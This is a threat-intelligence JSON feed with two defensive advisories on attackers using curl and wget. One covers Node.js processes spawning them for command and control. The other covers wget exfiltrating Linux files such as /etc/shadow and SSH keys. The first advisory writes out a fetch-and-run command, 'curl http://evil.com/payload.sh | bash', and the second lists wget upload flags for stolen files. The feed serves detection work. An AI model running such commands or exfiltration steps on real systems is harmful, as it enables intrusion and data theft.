{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/wget/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Node.js"],"_cs_severities":["medium"],"_cs_tags":["command_and_control","nodejs","curl","wget","initial_access"],"_cs_type":"advisory","_cs_vendors":["Node.js"],"content_html":"\u003cp\u003eThis threat brief focuses on the detection of malicious activity where Node.js, a widely used JavaScript runtime environment, is leveraged to execute command-line tools like curl and wget. This activity can occur either directly or indirectly through a shell. Attackers may exploit Node.js applications to download and execute malicious payloads, effectively using the compromised application as a conduit for command and control (C2) operations. This behavior is particularly concerning because it can be masked under the guise of legitimate application activity, making it harder to detect. Defenders should be aware of Node.js processes spawning child processes, specifically curl or wget, and investigate further.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker gains initial access to a system either via exploiting a vulnerable Node.js application or compromising a server running Node.js.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the \u003ccode\u003echild_process\u003c/code\u003e module in Node.js to execute system commands.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003echild_process.exec\u003c/code\u003e, \u003ccode\u003echild_process.spawn\u003c/code\u003e, or \u003ccode\u003echild_process.execFile\u003c/code\u003e to call a shell.\u003c/li\u003e\n\u003cli\u003eWithin the shell, the attacker executes \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e to download a malicious payload from a remote server. The attacker may use flags such as \u003ccode\u003e-sL\u003c/code\u003e or \u003ccode\u003e--insecure\u003c/code\u003e to bypass security measures.\u003c/li\u003e\n\u003cli\u003eThe downloaded payload is saved to a temporary directory like \u003ccode\u003e/tmp\u003c/code\u003e, \u003ccode\u003e/var/tmp\u003c/code\u003e, or \u003ccode\u003e/dev/shm\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker may then execute the downloaded payload using a shell interpreter (e.g., \u003ccode\u003ebash\u003c/code\u003e, \u003ccode\u003esh\u003c/code\u003e) by piping the output of \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e directly into the interpreter (e.g., \u003ccode\u003ecurl http://evil.com/payload.sh | bash\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe executed payload establishes a reverse shell or performs other malicious activities, such as data exfiltration or lateral movement.\u003c/li\u003e\n\u003cli\u003eThe attacker maintains persistence by creating cron jobs or systemd services that execute the malicious payload periodically.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation can lead to complete system compromise, data theft, and the establishment of a persistent foothold within the network. This can result in significant financial losses, reputational damage, and disruption of critical business operations. The use of Node.js makes detection difficult because it blends malicious activity with legitimate application behavior. The impact scales with the permissions of the account running the Node.js process.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement the provided Sigma rule to detect when Node.js spawns \u003ccode\u003ecurl\u003c/code\u003e or \u003ccode\u003ewget\u003c/code\u003e processes and tune it for your environment.\u003c/li\u003e\n\u003cli\u003eMonitor process creation events and network connections originating from Node.js processes to identify suspicious behavior.\u003c/li\u003e\n\u003cli\u003eEnforce strict egress filtering to prevent Node.js applications from communicating with unauthorized external endpoints.\u003c/li\u003e\n\u003cli\u003eRegularly audit Node.js application dependencies for known vulnerabilities and ensure timely patching.\u003c/li\u003e\n\u003cli\u003eUse application sandboxing and privilege separation to limit the impact of potential compromises.\u003c/li\u003e\n\u003cli\u003eImplement integrity monitoring to detect unauthorized modifications to files and configurations.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-30T10:00:00Z","date_published":"2024-01-30T10:00:00Z","id":"https://feed.craftedsignal.io/briefs/2024-01-nodejs-curl-wget/","summary":"Detection of Node.js directly or via a shell spawning curl or wget, potentially indicating command and control behavior where adversaries download tools or payloads onto the system.","title":"Node.js Spawning Curl or Wget for Command and Control","url":"https://feed.craftedsignal.io/briefs/2024-01-nodejs-curl-wget/"},{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["Linux"],"_cs_severities":["medium"],"_cs_tags":["exfiltration","wget","linux","data-theft"],"_cs_type":"advisory","_cs_vendors":["Linux"],"content_html":"\u003cp\u003eThis detection identifies the abuse of \u003ccode\u003ewget\u003c/code\u003e on Linux systems to exfiltrate data to external servers. Attackers may collect sensitive files, compress them, and then use \u003ccode\u003ewget\u003c/code\u003e with options such as \u003ccode\u003e--post-file\u003c/code\u003e, \u003ccode\u003e--post-data\u003c/code\u003e, or \u003ccode\u003e--body-file\u003c/code\u003e to transmit the data via HTTP/HTTPS. This activity, while not inherently malicious, becomes suspicious when combined with access to sensitive files or when observed in non-interactive sessions (e.g., cron jobs). The rule focuses on detecting unusual \u003ccode\u003ewget\u003c/code\u003e command-line arguments indicative of data exfiltration. This helps defenders identify potentially compromised systems where data is being stolen.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e Attacker gains access to the target Linux system through vulnerabilities, stolen credentials, or other means.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Collection:\u003c/strong\u003e Attacker identifies and collects sensitive files from various locations on the system, such as \u003ccode\u003e/etc/passwd\u003c/code\u003e, \u003ccode\u003e/etc/shadow\u003c/code\u003e, user SSH keys (\u003ccode\u003e~/.ssh/*\u003c/code\u003e), environment files (\u003ccode\u003e*.env*\u003c/code\u003e), and temporary directories (\u003ccode\u003e/tmp/*\u003c/code\u003e, \u003ccode\u003e/var/tmp/*\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eStaging:\u003c/strong\u003e The collected files are often compressed into an archive (e.g., \u003ccode\u003eloot.tar.gz\u003c/code\u003e) and placed in a temporary directory, like \u003ccode\u003e/tmp\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCommand Construction:\u003c/strong\u003e The attacker crafts a \u003ccode\u003ewget\u003c/code\u003e command to upload the staged data to a remote server. This command typically includes options like \u003ccode\u003e--post-file\u003c/code\u003e, \u003ccode\u003e--post-data\u003c/code\u003e, or \u003ccode\u003e--body-file\u003c/code\u003e to send the file content via HTTP POST.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExfiltration:\u003c/strong\u003e The \u003ccode\u003ewget\u003c/code\u003e command is executed, sending the staged data to the attacker's command and control (C2) server.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCleanup (Optional):\u003c/strong\u003e The attacker may attempt to delete the staged archive and any associated scripts to cover their tracks.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePersistence (Optional):\u003c/strong\u003e The attacker may schedule the exfiltration process via cron jobs or systemd timers to automate the data theft.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can result in the exfiltration of sensitive data, including credentials, configuration files, source code, and customer data. The severity of the impact depends on the nature of the exfiltrated data. Compromised credentials can lead to further unauthorized access to internal systems. Leaked source code can expose vulnerabilities. Stolen customer data can result in financial losses and reputational damage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026quot;Potential Data Exfiltration Through Wget\u0026quot; to your SIEM to detect suspicious \u003ccode\u003ewget\u003c/code\u003e commands (see \u003ccode\u003erules\u003c/code\u003e section).\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command-line arguments on Linux systems to capture the full \u003ccode\u003ewget\u003c/code\u003e command lines (reference: \u003ccode\u003elogsource\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rule by examining the process tree, user context, and destination endpoint to determine legitimacy.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring to detect unusual outbound HTTP/HTTPS traffic, especially POST requests to unfamiliar destinations.\u003c/li\u003e\n\u003cli\u003eHarden Linux systems by restricting the use of \u003ccode\u003ewget\u003c/code\u003e where it is not necessary and enforcing SELinux/AppArmor policies to limit its capabilities (reference: setup section).\u003c/li\u003e\n\u003cli\u003eRegularly review and audit cron jobs and systemd timers for suspicious entries that could be used for automated data exfiltration.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T10:00:00Z","date_published":"2024-01-09T10:00:00Z","id":"https://feed.craftedsignal.io/briefs/2024-01-09-wget-data-exfiltration/","summary":"This rule detects the use of wget on Linux systems to upload files to an external server, a tactic commonly used for data exfiltration.","title":"Potential Data Exfiltration via Wget on Linux Systems","url":"https://feed.craftedsignal.io/briefs/2024-01-09-wget-data-exfiltration/"}],"language":"en","title":"CraftedSignal Threat Feed - Wget","version":"https://jsonfeed.org/version/1.1"}